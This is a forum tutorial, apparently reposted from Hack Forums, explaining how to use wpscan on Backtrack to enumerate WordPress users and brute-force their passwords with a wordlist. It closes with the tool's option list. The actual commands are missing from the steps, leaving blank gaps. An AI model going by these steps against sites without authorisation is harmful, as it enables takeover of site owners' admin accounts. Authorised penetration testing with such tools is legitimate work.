Using this to hack a website that you do not have permission to hack is illegal. Make sure you have permission from the owner. I am not responsible for how you use this tool.
This is a re-post of my topic on Hack Forums. I wrote it myself.
You need to have Backtrack for this tutorial. Having the newest version always helps.
If you are viewing using the "NoScript" plugin, enable this page so you can view the spoilers.
Firstly, make sure you have wpscan installed. Here is my tutorial on how to do that: [ Register or Signin to view external links. ]

Please note that pasting text into terminal does not always work so you may need to type it manually.

Next, open up a new terminal window and type in:



Now you need a wordlist. [ Register or Signin to view external links. ] has some good password lists. Try to choose one that isn't too big because it will take a long time to go brute force.
When you have downloaded the file, extract it into a .txt file. This .txt file has to be put in: cd /pentest/web/wpscan

Next, type in the following text:



Press enter and it will probably take you to this:


Type "y" and press enter.

This will automatically start scanning for the admin panel, then find the user list, and then start brute forcing it.

All you have to do now is leave it to brute force each user until it finds a username with a matching password. You can't predict how long it will take to get the password. Obviously the more passwords in a passwords file, the more likely it is to crack it. But the more passwords in the file, the longer it will take to crack. The percentage of passwords tested will be displayed at the bottom, along with the username being attacked.

---

Here are some other commands for wpscan:
--update Update to the latest revision
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
p! only vulnerable plugins
t timthumbs
Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins
If no option is supplied, the default is 'tup!'

--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
--wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy Supply a proxy in the format host:port (will override the one from conf/browser.conf.json)
--wordlist | -w <wordlist> Supply a wordlist for the password bruter and do the brute.
--threads | -t <number of threads> The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
--username | -U <username> Only brute force the supplied username.
--help | -h This help screen.
--verbose | -v Verbose output.

If you have any questions, please comment them below. Hope I helped.